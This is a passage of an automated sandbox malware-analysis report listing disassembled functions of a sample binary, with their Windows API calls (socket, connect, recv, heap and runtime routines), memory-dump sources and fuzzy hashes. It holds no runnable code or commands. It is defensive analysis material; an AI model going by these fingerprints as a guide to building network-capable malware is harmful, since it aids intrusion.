                    • __freea.LIBCMT ref: 00446AAF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __alloca_probe_16__freea$Info
                    • String ID:
                    • API String ID: 2330168043-0
                    • Opcode ID: cbaa4673f5ff8862db29272040ab2082dd50e9928e22af3abc04efc5db2fe98c
                    • Instruction ID: 10efd5a829d972edac5f7f177fa14af3cd2182f54b741c455361477a6b2ea80f
                    • Opcode Fuzzy Hash: cbaa4673f5ff8862db29272040ab2082dd50e9928e22af3abc04efc5db2fe98c
                    • Instruction Fuzzy Hash: AD810472D006059BEF209E658841AEF7BB9EF4B714F1A401BE904B7240E779CC45CBAA
                    Function 00444CB4 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                    Download Yara Rule
                    APIs
                    • __alloca_probe_16.LIBCMT ref: 00444D38
                    • __alloca_probe_16.LIBCMT ref: 00444DFE
                    • __freea.LIBCMT ref: 00444E6A
                      • Part of subcall function 0043B0EB: HeapAlloc.KERNEL32(00000000,?,?,?,0043E590,00000220,?,?,?,?,?,?,0043768E,?), ref: 0043B11D
                    • __freea.LIBCMT ref: 00444E73
                    • __freea.LIBCMT ref: 00444E96
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __freea$__alloca_probe_16$AllocHeap
                    • String ID:
                    • API String ID: 1096550386-0
                    • Opcode ID: ed981a726e34d29eec07117bbe85d43771450238645a1f4fbecfa0b3ca24f07d
                    • Instruction ID: e3ec7627a5ea34dccdb9b477d1aea9347458ee8b8e155340acbb0e069fb26b32
                    • Opcode Fuzzy Hash: ed981a726e34d29eec07117bbe85d43771450238645a1f4fbecfa0b3ca24f07d
                    • Instruction Fuzzy Hash: 1C51A372A00216AFFB215F95DC81FAB77A9EFC4764F25012BFD0497250E738DC5186A8
                    Function 044CDDF7 Relevance: 7.7, APIs: 5, Instructions: 185COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f45b3cd53f4fbe66f848a6647b5ae0f8d5b032d3043932f0518009a9766fdba2
                    • Instruction ID: 09acd1fe8b8f74f35dee1638a35df2bd0c8ec6e843e8982afef8690ad2f191ce
                    • Opcode Fuzzy Hash: f45b3cd53f4fbe66f848a6647b5ae0f8d5b032d3043932f0518009a9766fdba2
                    • Instruction Fuzzy Hash: 9C6175B4D04714ABDF20DF65CD89B9AF7B8EF04304F1442AEE80DA7251EB74AA41CB56
                    Function 0040DE8E Relevance: 7.6, APIs: 5, Instructions: 142networkCOMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_unlock.LIBCPMT ref: 0040DEFD
                    • recv.WS2_32(?,?,00001F40,00000000), ref: 0040DF36
                    • recv.WS2_32(?,?,00001F40,00000000), ref: 0040DF64
                    • closesocket.WS2_32(?), ref: 0040DFD8
                    • __Mtx_unlock.LIBCPMT ref: 0040E00D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlockrecv$closesocket
                    • String ID:
                    • API String ID: 1157980791-0
                    • Opcode ID: 158086d292d45c85abeaa5be95d92c8111d92be6de9e5fb1e3c020eabcfe630b
                    • Instruction ID: 64baf80f3dbcb208198eef45908f3a95639eba4967a2abd8c04065fd2e83b998
                    • Opcode Fuzzy Hash: 158086d292d45c85abeaa5be95d92c8111d92be6de9e5fb1e3c020eabcfe630b
                    • Instruction Fuzzy Hash: 6951C5B1D00205AFD7209F61CC46B96B7B5FF04304F1486BFE81AA72A2EB75AD54CB49
                    Function 044F7248 Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 044F726A
                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 044F72C4
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,044F717A,?,000000FF), ref: 044F7352
                    • __dosmaperr.LIBCMT ref: 044F7359
                    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 044F7396
                      • Part of subcall function 044F75BE: __dosmaperr.LIBCMT ref: 044F75F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                    • String ID:
                    • API String ID: 1206951868-0
                    • Opcode ID: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
                    • Instruction ID: 7c87e6b422b989ebc9d6e138182671ac8519fd9e257c21747869edc419deaa29
                    • Opcode Fuzzy Hash: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
                    • Instruction Fuzzy Hash: 09413C75900704ABDF24DFB6DC459AFBBF9EF88300B14442EEA56D3610EB38A944CB61
                    Function 00436FE1 Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00437003
                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 0043705D
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00436F13,?,000000FF), ref: 004370EB
                    • __dosmaperr.LIBCMT ref: 004370F2
                    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0043712F
                      • Part of subcall function 00437357: __dosmaperr.LIBCMT ref: 0043738C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                    • String ID:
                    • API String ID: 1206951868-0
                    • Opcode ID: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
                    • Instruction ID: 86b53b091d5339d90dada3391adf114cdc1a48250b9c16bee365c924aaea3f03
                    • Opcode Fuzzy Hash: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
                    • Instruction Fuzzy Hash: 6C414EB6904704ABDB389FA6DC459AFBBF9EF48300B10542EF596D3610E6389840CB55
                    Function 044EDEA8 Relevance: 7.6, APIs: 5, Instructions: 123COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 044EDEDC
                      • Part of subcall function 044E92A6: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 044E92C7
                    • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 044EDF3B
                    • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 044EDF61
                    • Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 044EDF81
                    • Concurrency::location::_Assign.LIBCMT ref: 044EDFCE
                      • Part of subcall function 044F16A7: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 044F16EC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
                    • String ID:
                    • API String ID: 1879022333-0
                    • Opcode ID: 5aea100d1611f03f1beea5e0fb550c94f5de7610d73f87ec00ff82fe4494aade
                    • Instruction ID: b56548f47f23d13120bb4924a002ff2d39b870d27b52277b991d62c531194cf4
                    • Opcode Fuzzy Hash: 5aea100d1611f03f1beea5e0fb550c94f5de7610d73f87ec00ff82fe4494aade
                    • Instruction Fuzzy Hash: B04101B4A00211ABDF1ADF26C885BBEBB66AF45319F14409FE4065B382DB30BD05CB91
                    Function 0042DC41 Relevance: 7.6, APIs: 5, Instructions: 123COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042DC75
                      • Part of subcall function 0042903F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00429060
                    • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042DCD4
                    • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042DCFA
                    • Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 0042DD1A
                    • Concurrency::location::_Assign.LIBCMT ref: 0042DD67
                      • Part of subcall function 00431440: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00431485
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
                    • String ID:
                    • API String ID: 1879022333-0
                    • Opcode ID: 5aea100d1611f03f1beea5e0fb550c94f5de7610d73f87ec00ff82fe4494aade
                    • Instruction ID: 63ebb2224078d8bdd719b4d667a60a5c8aa541c12ffbf131e152555adb9a5383
                    • Opcode Fuzzy Hash: 5aea100d1611f03f1beea5e0fb550c94f5de7610d73f87ec00ff82fe4494aade
                    • Instruction Fuzzy Hash: 464126B0B00220ABDF19AB25E886BFEBB64AF45314F44409FE4065B382CF789D45C7D9
                    Function 044DF05D Relevance: 7.6, APIs: 5, Instructions: 101COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 044DF064
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 044DF08E
                      • Part of subcall function 044DF754: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 044DF771
                    • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 044DF10B
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 044DF13D
                    • __freea.LIBCMT ref: 044DF163
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__freea
                    • String ID:
                    • API String ID: 2497068736-0
                    • Opcode ID: 64bc477ca6d0e7906eca2e494a79156161fd0f552174310835e686a0cf1359d2
                    • Instruction ID: a7a02e0bf2b6661e372789cffd60aedec34049081f34aea16733a71e8e10fcec
                    • Opcode Fuzzy Hash: 64bc477ca6d0e7906eca2e494a79156161fd0f552174310835e686a0cf1359d2
                    • Instruction Fuzzy Hash: 05319071A002068BDF25DFA8C8605AEB7F5AF49314F25406FD506EB341DB74BD0ACB91
                    Function 004287D9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                    Download Yara Rule
                    APIs
                    • _SpinWait.LIBCONCRT ref: 004287FE
                      • Part of subcall function 0041EBE0: _SpinWait.LIBCONCRT ref: 0041EBF8
                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00428812
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00428844
                    • List.LIBCMT ref: 004288C7
                    • List.LIBCMT ref: 004288D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                    • String ID:
                    • API String ID: 3281396844-0
                    • Opcode ID: d3379cffcb3624c0f7b3b6030f0d212e7c0603c93dc2e1288b36c8e06a519342
                    • Instruction ID: 2a559f85231c331ddd4a9ce77051960e3928693ad3a01cc98d84397cd5210c7c
                    • Opcode Fuzzy Hash: d3379cffcb3624c0f7b3b6030f0d212e7c0603c93dc2e1288b36c8e06a519342
                    • Instruction Fuzzy Hash: 42318A32E02625DFCB14EFA5E5516EDB7B0BF14308F84406FD80127242DB396D04CB99
                    Function 044E76DB Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 044E7727
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 044E7769
                    • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 044E7785
                    • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 044E7790
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 044E77B7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 3897347962-0
                    • Opcode ID: 18d1e6f5588df1a187ef86af0e02b332a0a908ae4d907c5c7b9a669127731062
                    • Instruction ID: aaf1b3485b76f6959a2f96a2d82a61053d4ef4a0aa1e3e807ff789e7140f1272
                    • Opcode Fuzzy Hash: 18d1e6f5588df1a187ef86af0e02b332a0a908ae4d907c5c7b9a669127731062
                    • Instruction Fuzzy Hash: 3C218238A00219AFDF14EF66C494ABE77B5BF04356F1440AAD901A73A2DB34BE05CF90
                    Function 0040DD7F Relevance: 7.6, APIs: 5, Instructions: 80networkCOMMON
                    Download Yara Rule
                    APIs
                    • getaddrinfo.WS2_32(?,00000000,?,?), ref: 0040DDDC
                    • freeaddrinfo.WS2_32(?), ref: 0040DDFD
                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040DE25
                    • connect.WS2_32(00000000,?,00000010), ref: 0040DE37
                    • closesocket.WS2_32(00000000), ref: 0040DE51
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: closesocketconnectfreeaddrinfogetaddrinfosocket
                    • String ID:
                    • API String ID: 1398928706-0
                    • Opcode ID: a5accd40e6fd03b943f41d8c5a4d16b4670171b9b0cc7d5845fa08d30ba69220
                    • Instruction ID: 5b0568097f643a62a94e7b1fa31eb2be6006fd059ff3750f04bf8a84844ce590
                    • Opcode Fuzzy Hash: a5accd40e6fd03b943f41d8c5a4d16b4670171b9b0cc7d5845fa08d30ba69220
                    • Instruction Fuzzy Hash: 2B2188B5E043145BDB249BA1DC4ABEE7368DF44305F0011BBF909A62C1D77DAD848B5A
                    Function 044FF344 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 044FF35C
                      • Part of subcall function 044FB0FC: HeapFree.KERNEL32(00000000,00000000,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?), ref: 044FB112
                      • Part of subcall function 044FB0FC: GetLastError.KERNEL32(?,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?,?), ref: 044FB124
                    • _free.LIBCMT ref: 044FF36E
                    • _free.LIBCMT ref: 044FF380
                    • _free.LIBCMT ref: 044FF392
                    • _free.LIBCMT ref: 044FF3A4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
                    • Instruction ID: 5977bb728c406b8a87401bd8fda6c8761a142b9bfbf36aacaf5f76dac26e9311
                    • Opcode Fuzzy Hash: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
                    • Instruction Fuzzy Hash: 9BF04F32604A10FB9E30EB5AFE81C0B73D9EB01315355480BE618D7A20CFB0F8808655
                    Function 0043F0DD Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 0043F0F5
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 0043F107
                    • _free.LIBCMT ref: 0043F119
                    • _free.LIBCMT ref: 0043F12B
                    • _free.LIBCMT ref: 0043F13D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
                    • Instruction ID: 20cc99717a647c86e6a84bdeed4021dc3f5e7d0ecd55b80566e61f4c1914feb2
                    • Opcode Fuzzy Hash: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
                    • Instruction Fuzzy Hash: EBF04432944710ABC925EB55FA82C0B73E9EA48314F68282FF058D7601DB7CFC44466D
                    Function 00402670 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 207COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00402806
                    • ___std_exception_destroy.LIBVCRUNTIME ref: 004028A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy___std_exception_destroy
                    • String ID: P#@$P#@
                    • API String ID: 2970364248-3974838576
                    • Opcode ID: 8e6f47f53b86a165781106739808f43370944a5e520a2672acda0c2ea3881d75
                    • Instruction ID: d07b1476e1c9369c34cdbbae878fc5af4d4488366f6001985d65a31c5cb34ac4
                    • Opcode Fuzzy Hash: 8e6f47f53b86a165781106739808f43370944a5e520a2672acda0c2ea3881d75
                    • Instruction Fuzzy Hash: D4719471E002089BDB04DF98C985BDDFBB4EF49314F14822EE815B7381D778A984CBA9
                    Function 044FDD28 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: *?
                    • API String ID: 269201875-2564092906
                    • Opcode ID: e5011a25309ae06755606b4eb0abf58eb485cfb5f4646edeaebc0172359cf34e
                    • Instruction ID: 55de151aeb2fb0dc7974fca46cb27e9be3a0863d867f7bc103b647dd28cd3375
                    • Opcode Fuzzy Hash: e5011a25309ae06755606b4eb0abf58eb485cfb5f4646edeaebc0172359cf34e
                    • Instruction Fuzzy Hash: 93613EB5E002199FDF24CFA9C8809EEFBF5EF48314B14816AD916E7340E735AE418B90
                    Function 0043DAC1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: *?
                    • API String ID: 269201875-2564092906
                    • Opcode ID: e5011a25309ae06755606b4eb0abf58eb485cfb5f4646edeaebc0172359cf34e
                    • Instruction ID: a3f27f88263ce3e1505ace8c85f3ecc3a08bb576eb7af5fa0352c1f383531ab9
                    • Opcode Fuzzy Hash: e5011a25309ae06755606b4eb0abf58eb485cfb5f4646edeaebc0172359cf34e
                    • Instruction Fuzzy Hash: D4617BB1E002199FDB14CFA9D8815AEFBF5EF4C310F2591AAE805E7300D678AE418B94
                    Function 00442792 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 171timeCOMMON
                    Download Yara Rule
                    APIs
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 004427FC
                    • _free.LIBCMT ref: 004427EA
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 004429B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                    • String ID: XgE
                    • API String ID: 2155170405-2984570469
                    • Opcode ID: e6cff1b96d69b7330679c385eca8d8e9d46b42b402a043d23bc39838db8e0328
                    • Instruction ID: 4144492f74be2ab261ac73441af81b9bed5bd636e8574888bf5b0065352f6d8b
                    • Opcode Fuzzy Hash: e6cff1b96d69b7330679c385eca8d8e9d46b42b402a043d23bc39838db8e0328
                    • Instruction Fuzzy Hash: 5F512971D00215ABEB10FF668E819AE77BCAF44354F5102AFF510E3291EBF89E418B59
                    Function 044F4BB7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                    Download Yara Rule
                    APIs
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 044F4BF6
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 044F4CAA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentImageNonwritable___except_validate_context_record
                    • String ID: a:C$csm
                    • API String ID: 3480331319-2000533275
                    • Opcode ID: c6c3331f81419484f54866b6098c9c5dc2b5b23843a964c224861fa595cd409c
                    • Instruction ID: 8af0e493e7c357d8274c8a2459a425231cc12fca6f7ba45c7852ab9b9e629b18
                    • Opcode Fuzzy Hash: c6c3331f81419484f54866b6098c9c5dc2b5b23843a964c224861fa595cd409c
                    • Instruction Fuzzy Hash: B641E934A00248ABCF10DF69CC84A9FBBB4BF55328F158156EE145B352EB71F941CB91
                    Function 044F59D3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RtlEncodePointer.NTDLL(00000000), ref: 044F59F8
                    • CatchIt.LIBVCRUNTIME ref: 044F5ADE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CatchEncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 1435073870-2084237596
                    • Opcode ID: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
                    • Instruction ID: a19c344d53be4f7ae82a9c43bc920f84eb6026759bd4991fae0be753e92bd431
                    • Opcode Fuzzy Hash: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
                    • Instruction Fuzzy Hash: 70416871D00209FFDF15CF98CC80AEEBBB5BF48304F18815AFA14A6222D335A960DB50
                    Function 0043576C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00435791
                    • CatchIt.LIBVCRUNTIME ref: 00435877
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CatchEncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 1435073870-2084237596
                    • Opcode ID: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
                    • Instruction ID: f89fec4cce6058aad9e99e0a1a778d616f5fcef55721b1fb97097d1a833b2b70
                    • Opcode Fuzzy Hash: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
                    • Instruction Fuzzy Hash: C9417C71900609EFCF19EF94CD81AEEBBB5FF48304F14905AF90567251D3399A60DB94
                    Function 00403A80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00403B53
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00403B59
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00403B62
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
